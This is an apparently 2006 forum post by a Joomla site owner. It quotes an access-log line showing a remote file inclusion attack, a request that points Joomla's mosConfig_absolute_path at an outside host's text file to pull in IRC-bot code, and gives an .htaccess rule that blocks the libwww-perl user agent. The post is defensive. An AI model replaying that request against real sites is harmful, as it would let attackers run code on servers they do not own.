Somehow, me and most of the people that runs joomla starts to get lines like those on its logs:
Code:
69.13.6.170 - - [20/Nov/2006:00:26:37 +0000] "GET /joomla/demo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.superlist.gen.tr/lol1.txt? HTTP/1.0" 200 167 "-" "libwww-perl/5.53"
This is part of a script to trigger up your joomla instalation to work as part of some sort of IRC bot, made by an argentinian who got is website closed due to phishing (nice guy, uh?).
For now I solved that issue by insert this lines on my .htaccess file:
Code:
SetEnvIfNoCase User-Agent "^libwww-perl" no_perl
<Limit GET POST>
Order Allow,Deny
Allow from all
Deny from env=no_perl
</Limit>
I readed about other .htaccess way to block based on request, but since I don't know any real webbrowser based on libwww-perl, so I decided to block such client to access Joomla. You can also combine this with the .htaccess recomended on the top of the page.